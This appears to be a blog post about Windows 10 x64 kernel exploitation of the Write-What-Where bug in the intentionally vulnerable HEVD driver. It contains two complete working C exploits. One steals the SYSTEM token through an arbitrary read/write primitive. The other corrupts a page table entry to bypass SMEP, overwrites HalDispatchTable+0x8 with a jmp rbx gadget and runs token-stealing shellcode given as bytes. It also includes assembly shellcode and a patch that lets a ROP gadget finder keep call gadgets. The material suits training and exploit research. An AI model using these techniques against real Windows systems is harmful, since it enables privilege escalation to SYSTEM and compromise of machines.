Windows 10 x64 Kernel Exploitation - Arbitrary Write (Write-What-Where) using HEVD
What's a Write-What-Where (WWW)
*Where = *What;
Turning a Arbitrary Write into Arbitrary Read
The What
is the address we want to read, and the Where
is the address of a user mode variable.
void WriteQWORD(HANDLE hHEVD, PVOID what, PVOID where) {
WRITE_WHAT_WHERE www = {
.What = what,
.Where = where,
};
DWORD dwBytesReturned = 0;
DeviceIoControl(
hHEVD,
HEVD_IOCTL_ARBITRARY_WRITE,
&www,
sizeof(WRITE_WHAT_WHERE),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
u64 HalDispatchTable08 = kernelBase + 0xc00a68; // ? nt!HalDispatchTable+0x8 - nt
// Write the nt!HalDispatchTable+0x8 (What) into halDispatchTable08Val (Where)
u64 halDispatchTable08Val = 0;
WriteQWORD(hHEVD, HalDispatchTable08, &halDispatchTable08Val);
Note: HalDispatchTable08
(the where) is already an address, it will be dereferenced to get the data it points to. But we MUST pass the address of (using &
) halDispatchTable08Val
, not the value of the variable (which in this example is 0).
Methods for Exploitation (without RCE)
You can basically write the token stealing shellcode from the previous blog using the arbitrary read/write primitive. There is a slight distinction in that, in the shellcode we have the pointer to our own process (from the gs
register), and search for the PID 4 (SYSTEM) process. In this method it’s the opposite, we have the PID 4 (SYSTEM) process pointer (from PsInitialSystemProcess
), and have to search for our own process.
This code will replace the token of the current process with that of the PsInitialSystemProcess
(the PID 4 process).
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
typedef unsigned long long u64;
typedef struct _WRITE_WHAT_WHERE {
PVOID What;
PVOID Where;
} WRITE_WHAT_WHERE;
void WriteQWORD(HANDLE hHEVD, PVOID what, PVOID where) {
WRITE_WHAT_WHERE www = {
.What = what,
.Where = where,
};
DWORD dwBytesReturned = 0;
DeviceIoControl(
hHEVD,
HEVD_IOCTL_ARBITRARY_WRITE,
&www,
sizeof(WRITE_WHAT_WHERE),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
u64 ReadQWORD(HANDLE hHEVD, PVOID what) {
u64 val = 0;
WriteQWORD(hHEVD, what, &val);
return val;
}
u64 GetKernelBase(void) {
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (u64)drivers[0];
}
int main(void) {
const u64 TokenOffset = 0x4b8; // dt _EPROCESS Token
const u64 ActiveProcessLinksOffset = 0x448; // dt _EPROCESS ActiveProcessLinks
const u64 UniqueProcessIdOffset = 0x440; // dt _EPROCESS UniqueProcessId
const u64 PsInitialSystemProcessOffset = 0xcfc420; // ? nt!PsInitialSystemProcessPtr - nt
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hHEVD == INVALID_HANDLE_VALUE) ExitProcess(1);
u64 kernelBase = GetKernelBase();
if (kernelBase == 0) ExitProcess(1);
u64 PsInitialSystemProcessPtr = ReadQWORD(hHEVD, kernelBase + PsInitialSystemProcessOffset);
printf("PsInitialSystemProcessPtr: 0x%llx\n", PsInitialSystemProcessPtr);
u64 SystemProcessTokenPtr = ReadQWORD(hHEVD, PsInitialSystemProcessPtr + TokenOffset) & ~0xF;
printf("SystemProcessTokenPtr: 0x%llx\n", SystemProcessTokenPtr);
DWORD TargetPID = GetCurrentProcessId();
u64 ProcessHead = PsInitialSystemProcessPtr;
start:
ProcessHead = ReadQWORD(hHEVD, ProcessHead + ActiveProcessLinksOffset) - ActiveProcessLinksOffset;
if (ReadQWORD(hHEVD, ProcessHead + UniqueProcessIdOffset) != TargetPID) {
goto start;
}
u64 TargetProcessTokenRefCount = ReadQWORD(hHEVD, ProcessHead + TokenOffset) & 15;
u64 FinalToken = TargetProcessTokenRefCount | SystemProcessTokenPtr;
WriteQWORD(hHEVD, &FinalToken, ProcessHead + TokenOffset);
STARTUPINFOW si = { .cb = sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi))
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return 0;
}
However, we didn’t come all this way to simply get SYSTEM, RCE in the kernel || GTFO.
Methods for RCE Exploitation
Literally all you needs is:
- Any function pointer in the kernel (that isn't called too often)
- A way to trigger the kernel to call it
- (Optional) Have control over some registers when you trigger the call. Doesn't matter if we don’t, you can overwrite the pointer with the address of the shellcode stored in the kernel.
- (Optional) Have the function pointer stored in a writeable page. Doesn't matter if we don't, you can make it a writable page by modifying the PTE.
I'm certain there are countless ways to exploit a WWW, but finding these are not easy, and beyond the scope of this blog. I'll focus on the very well-known public technique of the HalDispatchTable
which meets all 4 of the criteria.
The HalDispatchTable
is a bunch of function pointers. We can overwrite the 2nd entry at HalDispatchTable+0x08
, and trigger it with NtQueryIntervalProfile
.
The big question is, wtf do we put in the HalDispatchTable
? Ideally, the address of some shellcode, right? But there are several considerations to be made with regards modern security control in Windows.
- Firstly, like the Stack Buffer Overflow blog, SMEP won't let us execute user land addresses in the kernel.
- kCFG (kernel Control-Flow Guard), even when VBS/HVCI is disabled, will perform a bitwise test to ensure user mode addresses aren't called from kernel mode. This happens during guarded calls, which is the cases of the
HalDispatchTable
. This is basically SMEP implemented again but in a different way. If VBS/HVCI is enabled, its way way more strict. - There is also Kernel Page-Table Isolation (KPTI) (also known as Kernel Virtual Address (KVA) Shadow) which as I understand causes user land pages to be mapped into the kernel without the executable bit. And every time I had issues, I thought it might be this, but in the end, it wasn't and I did nothing special to bypass KPTI, so I will continue not knowing exactly what it’s doing or stopping.
With these in mind, we have a few options:
- Put the address of a ROP gadget to Stack Pivot, ROP to disable SMEP and ret into the shellcode.
- Use the Arbitrary Write to modify the shellcode PTE, and a
jmp/call
gadget to execute the shellcode. - Find or use the Arbitrary Write to modify a page within the kernel, making it Read-Write-Execute. Write the shellcode into that page, and put that shellcode address into the
HalDispatchTable
.
I decided to implement the 2nd option.
Finding a JMP/CALL Gadget
While I was working on this late at night, I forgot jmp
gadgets exist, and became obsessed with finding a call rbx; ret
gadget. I quickly discovered that ropr can only find gadgets ending in a call
. It filters out the call
instruction from ROP gadget chains (because you'd rarely even want them). So, any gadget chain that ends in ret
will NEVER have a call
. This was going to be a problem, and while I could use another tool, I figured it would be easier to learn some Rust and make ropr do what I want.
It turns out it was fairly easy to get the behaviour I wanted by modifying the is_rop_gadget_head
function.
diff --git a/src/rules.rs b/src/rules.rs
index 0cb2992..3993d22 100644
--- a/src/rules.rs
+++ b/src/rules.rs
@@ -86,7 +86,8 @@ pub fn is_rop_gadget_head(instr: &Instruction, noisy: bool) -> bool {
match instr.flow_control() {
FlowControl::Next | FlowControl::Interrupt => true,
FlowControl::ConditionalBranch => noisy,
- FlowControl::Call => instr.mnemonic() != Mnemonic::Call,
+ FlowControl::Call => true,
+ FlowControl::IndirectCall => true,
_ => false,
}
}
In the end, I used a jmp rbx
gadget anyway. But I thought this was a fun little advantague and might be useful to know in the future for finding weird gadget chains.
Getting RCE in 13 Easy Steps
- VirtualAlloc Shellcode as PAGE_EXECUTE_READWRITE
- Get Kernel Base /w EnumDeviceDrivers
- Setup NtQueryIntervalProfile /w GetProcAddress
- Find Offsets to MiGetPteAddress, HalDispatchTable, and
jmp rbx
gadget - Get Drive Handle
- Leak virtual address of shellcode's PTE entry
- Leak shellcode's PTE control bits
- Modifying shellcode's PTE entry to bypass SMEP (Clear U/S bit)
- Save the nt!HalDispatchTable+0x8 so we can restore later
- Overwrite HalDispatchTable+0x8 with a ROP gadget
- Trigger HalDispatchTable+0x8 /w shellcode pointer in rbx
- Restore the HalDispatchTable and PTE
- Open a cmd.exe with the new SYSTEM token
I might update this blog later with more explanation but I think the code is fairly self-explanatory. The tricky part with the PTE has already been explained better than I can at https://connormcgarr.github.io/pte-overwrites/ and https://connormcgarr.github.io/paging/.
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef struct _WRITE_WHAT_WHERE {
PVOID What;
PVOID Where;
} WRITE_WHAT_WHERE;
void WriteQWORD(HANDLE hHEVD, PVOID what, PVOID where) {
WRITE_WHAT_WHERE www = {
.What = what,
.Where = where,
};
DWORD dwBytesReturned = 0;
DeviceIoControl(
hHEVD,
HEVD_IOCTL_ARBITRARY_WRITE,
&www,
sizeof(WRITE_WHAT_WHERE),
NULL,
0x00,
&dwBytesReturned,
NULL);
}
u64 ReadQWORD(HANDLE hHEVD, PVOID what) {
u64 val = 0;
WriteQWORD(hHEVD, what, &val);
return val;
}
int main(void) {
// ========================
// == 1. Setup Shellcode ==
// ========================
const u8 token_steal_shellcode[] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x4d, 0x8b,
0x88, 0xb8, 0x04, 0x00, 0x00, 0x4c, 0x89, 0x88, 0xb8, 0x04, 0x00, 0x00,
0x48, 0x31, 0xc0, 0xc3};
LPVOID shellcode = VirtualAlloc(NULL, sizeof(token_steal_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!shellcode) ExitProcess(1);
RtlMoveMemory(shellcode, token_steal_shellcode, sizeof(token_steal_shellcode));
printf("[+] Shellcode is located at: 0x%p\n", shellcode);
// ========================
// == 2. Get Kernel Base ==
// ========================
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
const u64 kernelBase = (u64)drivers[0];
if (kernelBase == 0) ExitProcess(1);
printf("[+] Kernel Base is located at: 0x%p\n", drivers[0]);
// =====================================
// == 3. Setup NtQueryIntervalProfile ==
// =====================================
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) ExitProcess(1);
printf("[+] NtQueryIntervalProfile is located at: 0x%p\n", NtQueryIntervalProfile);
// ==============================
// == 4. Setup Kernel Pointers ==
// ==============================
u64 ntmigetpteAddress = kernelBase + 0x27f783; // ? nt!MiGetPteAddress+0x13 - nt
u64 haldispatchTable = kernelBase + 0xc00a68; // ? nt!HalDispatchTable+0x8 - nt
//u64 CALL_RBX = kernelBase + 0x4e7ba8; // call rbx;
u64 JMP_RBX = kernelBase + 0x41f300; // jmp rbx;
printf("[+] nt!MiGetPteAddress+0x13 is located at: 0x%llx\n", ntmigetpteAddress);
printf("[+] nt!HalDispatchTable+0x8 is located at: 0x%llx\n", haldispatchTable);
printf("[+] JMP_RBX gadget is located at: 0x%llx\n", JMP_RBX);
// =========================
// == 5. Get Drive Handle ==
// =========================
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (!hHEVD) ExitProcess(1);
// =========================
// == 6. Leaking virtual address of shellcode's PTE entry
// =========================
u64 pteBase = ReadQWORD(hHEVD, ntmigetpteAddress);
printf("[+] Base of the page table entries: 0x%llx\n", pteBase);
// Bitwise operations to locate PTE of shellcode page
u64 shellcodePte = (u64)shellcode >> 9;
shellcodePte = shellcodePte & 0x7FFFFFFFF8;
shellcodePte = shellcodePte + pteBase;
printf("[+] Shellcode's PTE is located at: 0x%llx\n", shellcodePte);
// =========================
// == 7. Leaking shellcode's PTE control bits
// =========================
u64 ptecontrolBits = ReadQWORD(hHEVD, shellcodePte);
printf("[+] PTE control bits for shellcode page: 0x%llx\n", ptecontrolBits);
// =========================
// == 8. Modifying shellcode's PTE entry to bypass SMEP
// =========================
u64 taintedPte = ptecontrolBits; // Clear U/S bit (Kernel Mode)
taintedPte &= ~(1ULL << 2); // Clear U/S bit (Kernel Mode)
//taintedPte &= ~(1ULL << 63); // Clear XD bit (Executable) Apparently not needed
printf("[+] Corrupting PTE of shellcode to make U/S bit kernel mode...\n");
WriteQWORD(hHEVD, &taintedPte, shellcodePte);
// =========================
// == 9. Save the nt!HalDispatchTable+0x8 so we can restore later
// =========================
u64 legitimateHal = ReadQWORD(hHEVD, haldispatchTable);
// =========================
// == 10. Overwrite HalDispatchTable+0x8 with a ROP gadget
// =========================
WriteQWORD(hHEVD, &JMP_RBX, haldispatchTable);
// =========================
// == 11. Trigger HalDispatchTable+0x8 /w shellcode in rbx
// =========================
NtQueryIntervalProfile(0x1234, shellcode);
// =========================
// == 12. Restore the HalDispatchTable and PTE ==
// =========================
WriteQWORD(hHEVD, &legitimateHal, haldispatchTable);
WriteQWORD(hHEVD, &ptecontrolBits, shellcodePte);
//WriteBytes(hHEVD, &originalPml4Shellcode_Entry, pml4Shellcode_VirtualAddress);
// =========================
// == 13. Open a cmd.exe with the new SYSTEM token
// =========================
STARTUPINFOW si = { .cb = sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi))
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return 0;
}
It took me days to solve a BSOD caused by the token stealing shellcode (shown below). This shellcode has been posted on hundreads of blogs, and is imo wrong.
[BITS 64]
start:
mov rax, [gs:0x188] ; KPCRB.CurrentThread (_KTHREAD)
mov rax, [rax + 0xb8] ; APCState.Process (current _EPROCESS)
; dt nt!_KTHREAD ApcStateFill + dt nt!_KAPC_STATE Process
mov r8, rax ; Store current _EPROCESS ptr in RBX
loop:
mov r8, [r8 + 0x448] ; ActiveProcessLinks (dt _EPROCESS ActiveProcessLinks)
sub r8, 0x448 ; Go back to start of _EPROCESS (same offset as above)
mov r9, [r8 + 0x440] ; UniqueProcessId (PID) (dt _EPROCESS UniqueProcessId)
cmp r9, 4 ; SYSTEM PID?
jnz loop ; Loop until PID == 4
replace:
mov r9, [r8 + 0x4b8] ; Get SYSTEM token (dt _EPROCESS Token)
; and r9, 0xf0 ; Clear low 4 bits of _EX_FAST_REF structure
mov [rax + 0x4b8], r9 ; Copy SYSTEM token to current process (dt _EPROCESS Token)
xor rax,rax
ret
The and r9, 0xf0
line of code, which clears the reference counting bits, causes a SYSTEM_SERVICE_EXCEPTION
BSOD. I actually figured this out because I got this stack trace on a BSOD:
If we Google ObfReferenceObjectWithTag
you dont find much, but you will find simlar functions like:
The ObDereferenceObjectWithTag routine decrements the reference count of the specified object, and writes a four-byte tag value to the object to support object reference tracing
and
The ObfReferenceObject routine increments the reference count to the given object.
and the general theme is that these functions play with the reference counting bits, that we just NULL'ed into oblivion. I actually think the shellcode can be improved by keeping the original ref counting bits, and only replacing the token pointer, but after commenting out that line (shown above), the PoC has never caused a BSOD so that’s good enough for me for now.